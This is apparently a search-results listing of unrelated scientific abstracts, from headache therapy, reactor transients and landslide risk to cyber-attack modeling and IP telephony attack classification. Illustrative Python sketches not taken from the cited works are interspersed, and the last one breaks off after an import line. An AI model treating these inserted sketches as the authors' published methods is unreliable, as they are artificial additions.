    Full Text Available Background: A variety of interventions has been proposed for symptomatology relief in primary headaches. Among these, manual trigger points (TrPs) treatment gains popularity, but its effects have not been investigated yet. Objective: The aim was to establish the effectiveness of manual TrP treatment compared to minimal active or no active interventions in terms of frequency, intensity, and duration of attacks in adult people with primary headaches. Methods: We searched MEDLINE, COCHRANE, Web Of Science, and PEDro databases up to November 2017 for randomized controlled trials (RCTs). Two independent reviewers appraised the risk-of-bias (RoB) and the grading of recommendations, assessment, development, and evaluation (GRADE) to evaluate the overall quality of evidence. Results: Seven RCTs that compared manual treatment vs minimal active intervention were included: 5 focused on tension-type headache (TTH) and 2 on Migraine (MH); 3 out of 7 RCTs had high RoB. Combined TTH and MH results show statistically significant reduction for all outcomes after treatment compared to controls, but the level of evidence was very low. Subgroup analysis showed a statistically significant reduction in attack frequency (no. of attacks per month) after treatment in TTH (MD −3.50; 95% CI from −4.91 to −2.09; 4 RCTs) and in MH (MD −1.92; 95% CI from −3.03 to −0.80; 2 RCTs). Pain intensity (0–100 scale) was reduced in TTH (MD −12.83; 95% CI from −19.49 to −6.17; 4 RCTs) and in MH (MD −13.60; 95% CI from −19.54 to −7.66; 2 RCTs). Duration of attacks (hours) was reduced in TTH (MD −0.51; 95% CI from −0.97 to −0.04; 2 RCTs) and in MH (MD −10.68; 95% CI from −14.41 to −6.95; 1 RCT). Conclusion: Manual TrPs treatment of head and neck muscles may reduce frequency, intensity, and duration of attacks in TTH and MH, but the quality of evidence according to the GRADE approach was very low due to the presence of few studies, high RoB, and imprecision of results.

  14. Integrated modeling and analysis methodology for precision pointing applications

    Science.gov (United States)

    Gutierrez, Homero L.

    2002-07-01

    Space-based optical systems that perform tasks such as laser communications, Earth imaging, and astronomical observations require precise line-of-sight (LOS) pointing. A general approach is described for integrated modeling and analysis of these types of systems within the MATLAB/Simulink environment. The approach can be applied during all stages of program development, from early conceptual design studies to hardware implementation phases. The main objective is to predict the dynamic pointing performance subject to anticipated disturbances and noise sources. Secondary objectives include assessing the control stability, levying subsystem requirements, supporting pointing error budgets, and performing trade studies. The integrated model resides in Simulink, and several MATLAB graphical user interfaces (GUIs) allow the user to configure the model, select analysis options, run analyses, and process the results. A convenient parameter naming and storage scheme, as well as model conditioning and reduction tools and run-time enhancements, are incorporated into the framework. This enables the proposed architecture to accommodate models of realistic complexity.

  15. Adaptive cyber-attack modeling system

    Science.gov (United States)

    Gonsalves, Paul G.; Dougherty, Edward T.

    2006-05-01

    The pervasiveness of software and networked information systems is evident across a broad spectrum of business and government sectors. Such reliance provides an ample opportunity not only for the nefarious exploits of lone wolf computer hackers, but for more systematic software attacks from organized entities. Much effort and focus has been placed on preventing and ameliorating network and OS attacks; a concomitant emphasis is required to address protection of mission critical software. Typical software protection technique and methodology evaluation and verification and validation (V&V) involves the use of a team of subject matter experts (SMEs) to mimic potential attackers or hackers. This manpower-intensive, time-consuming, and potentially cost-prohibitive approach is not amenable to performing the necessary multiple non-subjective analyses required to support quantifying software protection levels. To facilitate the evaluation and V&V of software protection solutions, we have designed and developed a prototype adaptive cyber attack modeling system. Our approach integrates an off-line mechanism for rapid construction of Bayesian belief network (BN) attack models with an on-line model instantiation, adaptation and knowledge acquisition scheme. Off-line model construction is supported via a knowledge elicitation approach for identifying key domain requirements and a process for translating these requirements into a library of BN-based cyber-attack models. On-line attack modeling and knowledge acquisition is supported via BN evidence propagation and model parameter learning.
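
    The record above describes BN-based attack models only in general terms; the sketch below is a minimal, self-contained illustration of the idea rather than the authors' models. It encodes a three-node attack network with hand-picked hypothetical probabilities and updates the belief about attacker skill after observing a successful exploit, using brute-force enumeration.

        from itertools import product

        # P(skill), P(recon | skill), P(exploit | skill, recon) -- all values hypothetical.
        p_skill = {True: 0.2, False: 0.8}
        p_recon = {True: 0.9, False: 0.3}                      # keyed by skill
        p_exploit = {(True, True): 0.8, (True, False): 0.4,
                     (False, True): 0.3, (False, False): 0.05}  # keyed by (skill, recon)

        def joint(skill, recon, exploit):
            p = p_skill[skill]
            p *= p_recon[skill] if recon else 1.0 - p_recon[skill]
            pe = p_exploit[(skill, recon)]
            p *= pe if exploit else 1.0 - pe
            return p

        # Belief that the attacker is highly skilled, given that an exploit succeeded.
        num = sum(joint(True, r, True) for r in (True, False))
        den = sum(joint(s, r, True) for s, r in product((True, False), repeat=2))
        print(f"P(high skill | exploit observed) = {num / den:.3f}")

    Real tools delegate this evidence propagation to a BN engine and learn the conditional tables from data, but the update above is the same computation in miniature.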

  16. Methodology for Design and Analysis of Reactive Distillation Involving Multielement Systems

    DEFF Research Database (Denmark)

    Jantharasuk, Amnart; Gani, Rafiqul; Górak, Andrzej

    2011-01-01

    A new methodology for design and analysis of reactive distillation has been developed. In this work, the element-based approach, coupled with a driving force diagram, has been extended and applied to the design of a reactive distillation column involving multielement (multicomponent) systems...... consisting of two components. Based on this methodology, an optimal design configuration is identified using the equivalent binary-element-driving force diagram. Two case studies of methyl acetate (MeOAc) synthesis and methyl-tert-butyl ether (MTBE) synthesis have been considered to demonstrate...... the successful applications of the methodology. Moreover, energy requirements for various column configurations corresponding to different feed locatio...

  17. Landslide risk analysis: a multi-disciplinary methodological approach

    Directory of Open Access Journals (Sweden)

    S. Sterlacchini

    2007-11-01

    Full Text Available This study describes an analysis carried out within the European community project "ALARM" (Assessment of Landslide Risk and Mitigation in Mountain Areas, 2004) on landslide risk assessment in the municipality of Corvara in Badia, Italy. This mountainous area, located in the central Dolomites (Italian Alps), poses a significant landslide hazard to several man-made and natural objects. Three parameters for determining risk were analysed as an aid to preparedness and mitigation planning: event occurrence probability, elements at risk, and the vulnerability of these elements. Initially, a landslide hazard scenario was defined; this step was followed by the identification of the potential vulnerable elements, by the estimation of the expected physical effects, due to the occurrence of a damaging phenomenon, and by the analysis of social and economic features of the area. Finally, a potential risk scenario was defined, where the relationships between the event, its physical effects, and its economic consequences were investigated. People and public administrators with training and experience in local landsliding and slope processes were involved in each step of the analysis.

    A "cause-effect" correlation was applied, derived from the "dose-response" equation initially used in the biological sciences and then adapted by economists for the assessment of environmental risks. The relationship was analysed from a physical point of view and the cause (the natural event was correlated to the physical effects, i.e. the aesthetic, functional, and structural damage. An economic evaluation of direct and indirect damage was carried out considering the assets in the affected area (i.e., tourist flows, goods, transport and the effect on other social and economic activities. This study shows the importance of indirect damage, which is as significant as direct damage. The total amount of direct damage was estimated in 8 913 000 €; on the contrary, indirect

  18. Landslide risk analysis: a multi-disciplinary methodological approach

    Science.gov (United States)

    Sterlacchini, S.; Frigerio, S.; Giacomelli, P.; Brambilla, M.

    2007-11-01

    This study describes an analysis carried out within the European community project "ALARM" (Assessment of Landslide Risk and Mitigation in Mountain Areas, 2004) on landslide risk assessment in the municipality of Corvara in Badia, Italy. This mountainous area, located in the central Dolomites (Italian Alps), poses a significant landslide hazard to several man-made and natural objects. Three parameters for determining risk were analysed as an aid to preparedness and mitigation planning: event occurrence probability, elements at risk, and the vulnerability of these elements. Initially, a landslide hazard scenario was defined; this step was followed by the identification of the potential vulnerable elements, by the estimation of the expected physical effects, due to the occurrence of a damaging phenomenon, and by the analysis of social and economic features of the area. Finally, a potential risk scenario was defined, where the relationships between the event, its physical effects, and its economic consequences were investigated. People and public administrators with training and experience in local landsliding and slope processes were involved in each step of the analysis. A "cause-effect" correlation was applied, derived from the "dose-response" equation initially used in the biological sciences and then adapted by economists for the assessment of environmental risks. The relationship was analysed from a physical point of view and the cause (the natural event) was correlated to the physical effects, i.e. the aesthetic, functional, and structural damage. An economic evaluation of direct and indirect damage was carried out considering the assets in the affected area (i.e., tourist flows, goods, transport and the effect on other social and economic activities). This study shows the importance of indirect damage, which is as significant as direct damage. The total amount of direct damage was estimated in 8 913 000 €; on the contrary, indirect damage ranged considerably

  19. Mediation analysis in nursing research: a methodological review.

    Science.gov (United States)

    Liu, Jianghong; Ulrich, Connie

    2016-12-01

    Mediation statistical models help clarify the relationship between independent predictor variables and dependent outcomes of interest by assessing the impact of third variables. This type of statistical analysis is applicable for many clinical nursing research questions, yet its use within nursing remains low. Indeed, mediational analyses may help nurse researchers develop more effective and accurate prevention and treatment programs as well as help bridge the gap between scientific knowledge and clinical practice. In addition, this statistical approach allows nurse researchers to ask - and answer - more meaningful and nuanced questions that extend beyond merely determining whether an outcome occurs. Therefore, the goal of this paper is to provide a brief tutorial on the use of mediational analyses in clinical nursing research by briefly introducing the technique and, through selected empirical examples from the nursing literature, demonstrating its applicability in advancing nursing science.
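
    A bare-bones numerical illustration of the classic product-of-coefficients approach to mediation (not from the cited review; the simulated data and effect sizes are arbitrary): regress the mediator on the predictor to obtain path a, regress the outcome on both to obtain path b, and report the indirect effect a*b.

        import numpy as np

        rng = np.random.default_rng(42)
        n = 500
        x = rng.normal(size=n)                       # predictor
        m = 0.5 * x + rng.normal(scale=1.0, size=n)  # mediator (true a = 0.5)
        y = 0.4 * m + 0.2 * x + rng.normal(size=n)   # outcome (true b = 0.4, direct c' = 0.2)

        def ols(design, target):
            """Ordinary least squares via lstsq; returns coefficients (intercept first)."""
            X = np.column_stack([np.ones(len(target))] + list(design))
            beta, *_ = np.linalg.lstsq(X, target, rcond=None)
            return beta

        a = ols([x], m)[1]             # path a: X -> M
        b = ols([m, x], y)[1]          # path b: M -> Y controlling for X
        c_prime = ols([m, x], y)[2]    # direct effect of X on Y
        c_total = ols([x], y)[1]       # total effect

        print(f"indirect effect a*b = {a * b:.3f}, direct = {c_prime:.3f}, total = {c_total:.3f}")

    In practice, confidence intervals for the indirect effect are usually obtained by bootstrapping, and dedicated packages handle multiple mediators and covariates.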

  20. Methodology for analysis and simulation of large multidisciplinary problems

    Science.gov (United States)

    Russell, William C.; Ikeda, Paul J.; Vos, Robert G.

    1989-01-01

    The Integrated Structural Modeling (ISM) program is being developed for the Air Force Weapons Laboratory and will be available for Air Force work. Its goal is to provide a design, analysis, and simulation tool intended primarily for directed energy weapons (DEW), kinetic energy weapons (KEW), and surveillance applications. The code is designed to run on DEC (VMS and UNIX), IRIS, Alliant, and Cray hosts. Several technical disciplines are included in ISM, namely structures, controls, optics, thermal, and dynamics. Four topics from the broad ISM goal are discussed. The first is project configuration management and includes two major areas: the software and database arrangement and the system model control. The second is interdisciplinary data transfer and refers to exchange of data between various disciplines such as structures and thermal. Third is a discussion of the integration of component models into one system model, i.e., multiple discipline model synthesis. Last is a presentation of work on a distributed processing computing environment.

  1. THE MURCHISON WIDEFIELD ARRAY 21 cm POWER SPECTRUM ANALYSIS METHODOLOGY

    Energy Technology Data Exchange (ETDEWEB)

    Jacobs, Daniel C.; Beardsley, A. P.; Bowman, Judd D. [Arizona State University, School of Earth and Space Exploration, Tempe, AZ 85287 (United States); Hazelton, B. J.; Sullivan, I. S.; Barry, N.; Carroll, P. [University of Washington, Department of Physics, Seattle, WA 98195 (United States); Trott, C. M.; Pindor, B.; Briggs, F.; Gaensler, B. M. [ARC Centre of Excellence for All-sky Astrophysics (CAASTRO) (Australia); Dillon, Joshua S.; Oliveira-Costa, A. de; Ewall-Wice, A.; Feng, L. [MIT Kavli Institute for Astrophysics and Space Research, Cambridge, MA 02139 (United States); Pober, J. C. [Brown University, Department of Physics, Providence, RI 02912 (United States); Bernardi, G. [Department of Physics and Electronics, Rhodes University, Grahamstown 6140 (South Africa); Cappallo, R. J.; Corey, B. E. [MIT Haystack Observatory, Westford, MA 01886 (United States); Emrich, D., E-mail: daniel.c.jacobs@asu.edu [International Centre for Radio Astronomy Research, Curtin University, Perth, WA 6845 (Australia); and others

    2016-07-10

    We present the 21 cm power spectrum analysis approach of the Murchison Widefield Array Epoch of Reionization project. In this paper, we compare the outputs of multiple pipelines for the purpose of validating statistical limits on cosmological hydrogen at redshifts between 6 and 12. Multiple independent data calibration and reduction pipelines are used to make power spectrum limits on a fiducial night of data. Comparing the outputs of imaging and power spectrum stages highlights differences in calibration, foreground subtraction, and power spectrum calculation. The power spectra found using these different methods span a space defined by the various tradeoffs between speed, accuracy, and systematic control. Lessons learned from comparing the pipelines range from the algorithmic to the prosaically mundane; all demonstrate the many pitfalls of neglecting reproducibility. We briefly discuss the way these different methods attempt to handle the question of evaluating a significant detection in the presence of foregrounds.

  2. Methodology for global nonlinear analysis of nuclear systems

    International Nuclear Information System (INIS)

    Cacuci, D.G.; Cacuci, G.L.

    1987-01-01

    This paper outlines a general method for globally computing the crucial features of nonlinear problems: bifurcations, limit points, saddle points, extrema (maxima and minima); our method also yields the local sensitivities (i.e., first order derivatives) of the system's state variables (e.g., fluxes, power, temperatures, flows) at any point in the system's phase space. We also present an application of this method to the nonlinear BWR model discussed in Refs. 8 and 11. The most significant novel feature of our method is the recasting of a general mathematical problem comprising three aspects: (1) nonlinear constrained optimization, (2) sensitivity analysis, into a fixed point problem of the form F[u(s), λ(s)] = 0 whose global zeros and singular points are related to the special features (i.e., extrema, bifurcations, etc.) of the original problem
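
    To give a flavour of what following zeros of F[u(s), λ(s)] = 0 can look like in practice, here is a generic natural-parameter continuation sketch; it is not the authors' method and it uses a deliberately simple scalar test problem. Newton's method re-solves F(u, λ) = 0 as λ is stepped, and a small ∂F/∂u flags an approaching singular (turning or bifurcation) point.

        import numpy as np

        def F(u, lam):
            return u**3 - u + lam              # simple scalar test problem with fold (turning) points

        def dFdu(u, lam):
            return 3.0 * u**2 - 1.0

        def newton(u0, lam, tol=1e-10, itmax=50):
            u = u0
            for _ in range(itmax):
                du = -F(u, lam) / dFdu(u, lam)
                u += du
                if abs(du) < tol:
                    return u
            raise RuntimeError("no convergence")

        u = 1.2                                # warm start on the upper solution branch
        for lam in np.linspace(-0.5, 0.5, 201):
            try:
                u = newton(u, lam)
            except RuntimeError:
                print(f"branch lost near lambda = {lam:.3f} (turning point passed)")
                break
            if abs(dFdu(u, lam)) < 0.2:        # small Jacobian signals a nearby singular point
                print(f"approaching singular point: lambda = {lam:.3f}, u = {u:.3f}, "
                      f"dF/du = {dFdu(u, lam):+.3f}")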

  3. New approaches in intelligent image analysis techniques, methodologies and applications

    CERN Document Server

    Nakamatsu, Kazumi

    2016-01-01

    This book presents an Introduction and 11 independent chapters, which are devoted to various new approaches of intelligent image processing and analysis. The book also presents new methods, algorithms and applied systems for intelligent image processing, on the following basic topics: Methods for Hierarchical Image Decomposition; Intelligent Digital Signal Processing and Feature Extraction; Data Clustering and Visualization via Echo State Networks; Clustering of Natural Images in Automatic Image Annotation Systems; Control System for Remote Sensing Image Processing; Tissue Segmentation of MR Brain Images Sequence; Kidney Cysts Segmentation in CT Images; Audio Visual Attention Models in Mobile Robots Navigation; Local Adaptive Image Processing; Learning Techniques for Intelligent Access Control; Resolution Improvement in Acoustic Maps. Each chapter is self-contained with its own references. Some of the chapters are devoted to the theoretical aspects while the others are presenting the practical aspects and the...

  4. A faster reactor transient analysis methodology for PCs

    International Nuclear Information System (INIS)

    Ott, K.O.

    1991-10-01

    The simplified ANL model for LMR transient analysis, in which point kinetics as well as lumped descriptions of the heat transfer equations in all components are applied, is converted from a differential into an integral formulation. All differential balance equations are implicitly solved in terms of convolution integrals. The prompt jump approximation is applied as the strong negative feedback effectively keeps the net reactivity well below prompt critical. After implicit finite differencing of the convolution integrals, the kinetics equation assumes the form of a quadratic equation, the "quadratic dynamics equation." This model forms the basis for the GW-BASIC program LTC (LMR Transient Calculation), which can effectively be run on a PC. The GW-BASIC version of the LTC program is described in detail in Volume 2 of this report

  5. Methodology for diagnosing of skin cancer on images of dermatologic spots by spectral analysis

    OpenAIRE

    Guerra-Rosas, Esperanza; Álvarez-Borrego, Josué

    2015-01-01

    In this paper a new methodology for the diagnosing of skin cancer on images of dermatologic spots using image processing is presented. Currently skin cancer is one of the most frequent diseases in humans. This methodology is based on Fourier spectral analysis by using filters such as the classic, inverse and k-law nonlinear. The sample images were obtained by a medical specialist and a new spectral technique is developed to obtain a quantitative measurement of the complex pattern found in can...
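
    For orientation only, the sketch below applies a k-law nonlinear operation in the Fourier domain to a 2-D array: the spectrum's phase is kept and its magnitude is raised to the power k (k = 1 reproduces the classical spectrum, k = 0 keeps phase only). It is a generic illustration, not the diagnostic pipeline of the cited work, and the synthetic "image" is random.

        import numpy as np

        def k_law_filter(image, k):
            """Raise the Fourier magnitude to the power k while preserving phase."""
            spectrum = np.fft.fft2(image)
            magnitude = np.abs(spectrum)
            phase = np.angle(spectrum)
            modified = (magnitude ** k) * np.exp(1j * phase)
            return np.real(np.fft.ifft2(modified))

        rng = np.random.default_rng(3)
        img = rng.random((128, 128))            # stand-in for a dermatologic spot image

        for k in (1.0, 0.5, 0.1):
            out = k_law_filter(img, k)
            # A simple scalar descriptor of the filtered result; a real pipeline would
            # derive quantitative spectral indices and compare them across lesion classes.
            print(f"k = {k:3.1f}  output energy = {np.sum(out**2):.3e}")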

  6. submitter Methodologies for the Statistical Analysis of Memory Response to Radiation

    CERN Document Server

    Bosser, Alexandre L; Tsiligiannis, Georgios; Frost, Christopher D; Zadeh, Ali; Jaatinen, Jukka; Javanainen, Arto; Puchner, Helmut; Saigne, Frederic; Virtanen, Ari; Wrobel, Frederic; Dilillo, Luigi

    2016-01-01

    Methodologies are proposed for in-depth statistical analysis of Single Event Upset data. The motivation for using these methodologies is to obtain precise information on the intrinsic defects and weaknesses of the tested devices, and to gain insight on their failure mechanisms, at no additional cost. The case study is a 65 nm SRAM irradiated with neutrons, protons and heavy ions. This publication is an extended version of a previous study [1].

  7. Fuzzy Clustering based Methodology for Multidimensional Data Analysis in Computational Forensic Domain

    OpenAIRE

    Kilian Stoffel; Paul Cotofrei; Dong Han

    2012-01-01

    As an interdisciplinary domain requiring advanced and innovative methodologies, the computational forensics domain is characterized by data that are simultaneously large-scale, uncertain, multidimensional and approximate. Forensic domain experts trained to discover hidden patterns in crime data are limited in their analysis without the assistance of a computational intelligence approach. In this paper a methodology and an automatic procedure based on fuzzy set theory and designed to infer precis...

  8. Methodology of the Integrated Analysis of Company's Financial Status and Its Performance Results

    OpenAIRE

    Mackevičius, Jonas; Valkauskas, Romualdas

    2010-01-01

    Information about a company's financial status and its performance results is very important for the objective evaluation of the company's position in the market and its competitive possibilities in the future. Such information is provided in the financial statements. It is important to apply and investigate this information properly. A methodology for the integrated analysis of a company's financial status and performance results is recommended in this article. This methodology consists of these three elements...

  9. A fast reactor transient analysis methodology for personal computers

    International Nuclear Information System (INIS)

    Ott, K.O.

    1993-01-01

    A simplified model for a liquid-metal-cooled reactor (LMR) transient analysis, in which point kinetics as well as lumped descriptions of the heat transfer equations in all components are applied, is converted from a differential into an integral formulation. All 30 differential balance equations are implicitly solved in terms of convolution integrals. The prompt jump approximation is applied as the strong negative feedback effectively keeps the net reactivity well below prompt critical. After implicit finite differencing of the convolution integrals, the kinetics equation assumes a new form, i.e., the quadratic dynamics equation. In this integral formulation, the initial value problem of typical LMR transients can be solved with large time steps (initially 1 s, later up to 256 s). This then makes transient problems amenable to treatment on a personal computer. The resulting mathematical model forms the basis for the GW-BASIC LMR transient calculation (LTC) program. The LTC program has also been converted to QuickBASIC. The running time for a 10-h overpower transient is then ∼40 to 10 s, depending on the hardware version (286, 386, or 486 with math coprocessors)
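
    The abstract does not reproduce the model equations, so the sketch below only illustrates the prompt jump approximation for one-delayed-group point kinetics with a simple lumped temperature feedback; the parameter values are hypothetical and this is not the LTC quadratic dynamics formulation. With the prompt jump, the amplitude follows n = Λ λ C / (β − ρ), so each time step only the slow precursor and temperature balances need to be advanced, which is what permits large time steps.

        # One-group point kinetics with prompt jump approximation (illustrative values only).
        beta, lam, Lam = 0.0065, 0.08, 1.0e-3      # delayed fraction, decay constant [1/s], generation time [s]
        alpha = -2.0e-5                            # temperature feedback coefficient [dk/k per K]
        h, P0, T0 = 5.0e-3, 1.0, 300.0             # heat-up coefficient, initial power, initial temperature

        rho_ext = 0.002                            # external reactivity step (< beta, so prompt jump applies)
        C = beta * P0 / (lam * Lam)                # equilibrium precursor concentration
        T = T0
        dt, t_end = 0.5, 200.0                     # large time steps are acceptable in this formulation

        for step in range(int(t_end / dt) + 1):
            t = step * dt
            rho = rho_ext + alpha * (T - T0)       # net reactivity with feedback
            P = Lam * lam * C / (beta - rho)       # prompt jump approximation for the amplitude
            # explicit update of the slow variables (precursors and lumped temperature)
            C += dt * (beta * P / Lam - lam * C)
            T += dt * (h * P - 0.01 * (T - T0))
            if step % 80 == 0:
                print(f"t = {t:6.1f} s  rho = {rho:+.5f}  P/P0 = {P:8.3f}  T - T0 = {T - T0:7.1f} K")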

  10. Textbooks in transitional countries: Towards a methodology for comparative analysis

    Directory of Open Access Journals (Sweden)

    Miha Kovač

    2004-01-01

    Full Text Available In its first part, the paper analyses the ambiguous nature of the book as a medium: its physical production and its distribution to the end user takes place on a market basis; on the other hand, its content is predominantly consumed in a sector that was at least in the continental Europe traditionally considered as public and non-profit making. This ambiguous nature of the book and with it the impact of the market on the organization of knowledge in book format remains a dark spot in contemporary book research. On the other hand, textbooks are considered as ephemera both in contemporary education and book studies. Therefore, research on textbooks publishing models could be considered as a blind-spot of contemporary social studies. As a consequence, in the majority of European countries, textbook publishing and the organization of the textbook market are considered as self-evident. Throughout a comparative analysis of textbook publishing models in small transitional and developed countries, the paper points out that this self-evident organization of the textbook market is always culturally determined. In its final part, the paper compares different models of textbook publishing and outlines the scenarios for the development of the Slovene textbook market.

  11. Energy minimization in medical image analysis: Methodologies and applications.

    Science.gov (United States)

    Zhao, Feng; Xie, Xianghua

    2016-02-01

    Energy minimization is of particular interest in medical image analysis. In the past two decades, a variety of optimization schemes have been developed. In this paper, we present a comprehensive survey of the state-of-the-art optimization approaches. These algorithms are mainly classified into two categories: continuous method and discrete method. The former includes Newton-Raphson method, gradient descent method, conjugate gradient method, proximal gradient method, coordinate descent method, and genetic algorithm-based method, while the latter covers graph cuts method, belief propagation method, tree-reweighted message passing method, linear programming method, maximum margin learning method, simulated annealing method, and iterated conditional modes method. We also discuss the minimal surface method, primal-dual method, and the multi-objective optimization method. In addition, we review several comparative studies that evaluate the performance of different minimization techniques in terms of accuracy, efficiency, or complexity. These optimization techniques are widely used in many medical applications, for example, image segmentation, registration, reconstruction, motion tracking, and compressed sensing. We thus give an overview on those applications as well. Copyright © 2015 John Wiley & Sons, Ltd.
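
    As a concrete toy example from the continuous (gradient descent) family surveyed above, and not code from the paper itself, the sketch below minimizes a classical denoising energy E(u) = ||u − f||² + λ||∇u||² for a 1-D signal by explicit gradient descent; the signal, noise level, and step size are arbitrary.

        import numpy as np

        rng = np.random.default_rng(7)
        n = 200
        clean = np.sign(np.sin(np.linspace(0, 3 * np.pi, n)))        # piecewise-constant-ish signal
        f = clean + 0.4 * rng.normal(size=n)                         # noisy observation

        lam, tau, iters = 2.0, 0.1, 500                              # smoothness weight, step size, iterations
        u = f.copy()

        def laplacian(v):
            lap = np.zeros_like(v)
            lap[1:-1] = v[:-2] - 2.0 * v[1:-1] + v[2:]               # second difference; free end points
            return lap

        for it in range(iters):
            grad = (u - f) - lam * laplacian(u)       # gradient of E (constant factor absorbed into tau)
            u -= tau * grad
            if it % 100 == 0:
                energy = np.sum((u - f) ** 2) + lam * np.sum(np.diff(u) ** 2)
                print(f"iter {it:4d}  energy = {energy:.2f}")

        print(f"RMSE vs clean: noisy = {np.sqrt(np.mean((f - clean)**2)):.3f}, "
              f"denoised = {np.sqrt(np.mean((u - clean)**2)):.3f}")

    Discrete methods such as graph cuts or belief propagation tackle the same kind of energy when the labels are categorical, as in segmentation.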

  12. Automatic Classification of Attacks on IP Telephony

    Directory of Open Access Journals (Sweden)

    Jakub Safarik

    2013-01-01

    Full Text Available This article proposes an algorithm for automatic analysis of attack data in an IP telephony network with a neural network. Data for the analysis are gathered from various monitoring applications running in the network. These monitoring systems are a typical part of today's networks, and information from them is usually used only after an attack. Automatic classification of IP telephony attacks makes nearly real-time classification possible, enabling counter-attack or mitigation of potential attacks. The classification uses the proposed neural network, and the article covers the design of the neural network and its practical implementation. It also contains methods for neural network learning and data gathering functions from a honeypot application.
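
    The article's own feature set and network design are not reproduced in the abstract; the sketch below merely shows the general shape of such a classifier using scikit-learn's MLPClassifier on made-up monitoring features (calls per second, distinct sources, failed-authentication ratio) and made-up attack labels.

        import numpy as np
        from sklearn.model_selection import train_test_split
        from sklearn.neural_network import MLPClassifier
        from sklearn.preprocessing import StandardScaler
        from sklearn.pipeline import make_pipeline

        rng = np.random.default_rng(0)

        def synth(n, center):
            """Synthetic feature vectors: [calls/s, distinct sources, failed-auth ratio]."""
            return rng.normal(loc=center, scale=[5.0, 3.0, 0.05], size=(n, 3))

        X = np.vstack([synth(300, [20, 10, 0.02]),     # normal traffic
                       synth(300, [90, 60, 0.05]),     # flood-style attack
                       synth(300, [25, 12, 0.45])])    # scanning / brute-force style attack
        y = np.array([0] * 300 + [1] * 300 + [2] * 300)

        X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.3, random_state=1, stratify=y)
        model = make_pipeline(StandardScaler(),
                              MLPClassifier(hidden_layer_sizes=(16, 8), max_iter=2000, random_state=1))
        model.fit(X_tr, y_tr)
        print(f"test accuracy: {model.score(X_te, y_te):.3f}")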

  13. Economy As A Phenomenon Of Culture: Theoretical And Methodological Analysis

    Directory of Open Access Journals (Sweden)

    S. N. Ivaskovsky

    2017-01-01

    Full Text Available The article redefines economy as a phenomenon of culture, a product of a historically and socially grounded set of values shared by members of a given society. The research shows that culture is not always identical to social utility, because there are multiple examples when archaic, traditionalist, irrational cultural norms hinder social and economic progress and trap nations into poverty and underdevelopment. One of the reasons for the lack of scholarly attention to cultural dimension of economy is the triumph of positivism in economics. Mathematics has become the dominant language of economic analysis. It leads to the transformation of the economics into a sort of «social physics», accompanied by the loss of its original humanitarian nature shared in the works of all the great economists of the past. The author emphasizes the importance of the interdisciplinary approach to the economic research and the incorporation of the achievements of the other social disciplines – history, philosophy, sociology and cultural studies - into the subject matter of economic theory. Substantiating the main thesis of the article, the author shows that there is a profound ontological bond between economy and culture, which primarily consists in the fact that these spheres of human relations are aimed at the solution of the same problem – the competitive selection of the best ways for survival of people, of satisfying the relevant living needs. In order to overcome the difficulties related to the inclusion of culture in the set of analytical tools used in the economic theory, the author suggests using a category of «cultural capital», which reestablishes the earlier and more familiar for the economists meaning of capital.

  14. Mathematical modelling methodologies in predictive food microbiology: a SWOT analysis.

    Science.gov (United States)

    Ferrer, Jordi; Prats, Clara; López, Daniel; Vives-Rego, Josep

    2009-08-31

    Predictive microbiology is the area of food microbiology that attempts to forecast the quantitative evolution of microbial populations over time. This is achieved to a great extent through models that include the mechanisms governing population dynamics. Traditionally, the models used in predictive microbiology are whole-system continuous models that describe population dynamics by means of equations applied to extensive or averaged variables of the whole system. Many existing models can be classified by specific criteria. We can distinguish between survival and growth models by seeing whether they tackle mortality or cell duplication. We can distinguish between empirical (phenomenological) models, which mathematically describe specific behaviour, and theoretical (mechanistic) models with a biological basis, which search for the underlying mechanisms driving already observed phenomena. We can also distinguish between primary, secondary and tertiary models, by examining their treatment of the effects of external factors and constraints on the microbial community. Recently, the use of spatially explicit Individual-based Models (IbMs) has spread through predictive microbiology, due to the current technological capacity of performing measurements on single individual cells and thanks to the consolidation of computational modelling. Spatially explicit IbMs are bottom-up approaches to microbial communities that build bridges between the description of micro-organisms at the cell level and macroscopic observations at the population level. They provide greater insight into the mesoscale phenomena that link unicellular and population levels. Every model is built in response to a particular question and with different aims. Even so, in this research we conducted a SWOT (Strength, Weaknesses, Opportunities and Threats) analysis of the different approaches (population continuous modelling and Individual-based Modelling), which we hope will be helpful for current and future
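
    As a small illustration of the primary growth models discussed, and not code from the paper, the sketch below evaluates the modified Gompertz model widely used in predictive microbiology, log10 N(t) = log10 N0 + A·exp(−exp(μm·e/A·(λ−t)+1)), with hypothetical parameter values.

        import numpy as np

        def gompertz_log10(t, log_n0, A, mu_max, lag):
            """Modified Gompertz primary growth model (Zwietering-type), in log10 units."""
            e = np.e
            return log_n0 + A * np.exp(-np.exp(mu_max * e / A * (lag - t) + 1.0))

        # Hypothetical parameters: 3 log10 inoculum, 6 log10 total increase,
        # maximum growth rate 0.4 log10/h, 5 h lag phase.
        t = np.arange(0, 49, 6.0)                 # hours
        y = gompertz_log10(t, log_n0=3.0, A=6.0, mu_max=0.4, lag=5.0)

        for ti, yi in zip(t, y):
            print(f"t = {ti:4.0f} h   log10 N = {yi:5.2f}")

    Secondary models would then express how mu_max and lag depend on temperature, pH, or water activity, while individual-based models resolve single cells instead of these averaged variables.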

  15. Plants under dual attack

    NARCIS (Netherlands)

    Ponzio, C.A.M.

    2016-01-01

    Though immobile, plants are members of complex environments, and are under constant threat from a wide range of attackers, including organisms such as insect herbivores and plant pathogens. Plants have developed sophisticated defenses against these attackers, which include chemical responses

  16. Heart attack - discharge

    Science.gov (United States)

  17. Fukushima Daiichi unit 1 uncertainty analysis--Preliminary selection of uncertain parameters and analysis methodology

    Energy Technology Data Exchange (ETDEWEB)

    Cardoni, Jeffrey N.; Kalinich, Donald A.

    2014-02-01

    Sandia National Laboratories (SNL) plans to conduct uncertainty analyses (UA) on the Fukushima Daiichi unit 1 (1F1) plant with the MELCOR code. The model to be used was developed for a previous accident reconstruction investigation jointly sponsored by the US Department of Energy (DOE) and Nuclear Regulatory Commission (NRC). However, that study only examined a handful of various model inputs and boundary conditions, and the predictions yielded only fair agreement with plant data and current release estimates. The goal of this uncertainty study is to perform a focused evaluation of uncertainty in core melt progression behavior and its effect on key figures-of-merit (e.g., hydrogen production, vessel lower head failure, etc.). In preparation for the SNL Fukushima UA work, a scoping study has been completed to identify important core melt progression parameters for the uncertainty analysis. The study also lays out a preliminary UA methodology.
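
    Purely as an illustration of the sampling step in such an uncertainty study, the sketch below draws Latin-hypercube-style samples of a few uncertain inputs that would then drive repeated code runs; the parameter names and ranges are invented and are not the MELCOR parameters selected in the report.

        import numpy as np

        rng = np.random.default_rng(2024)

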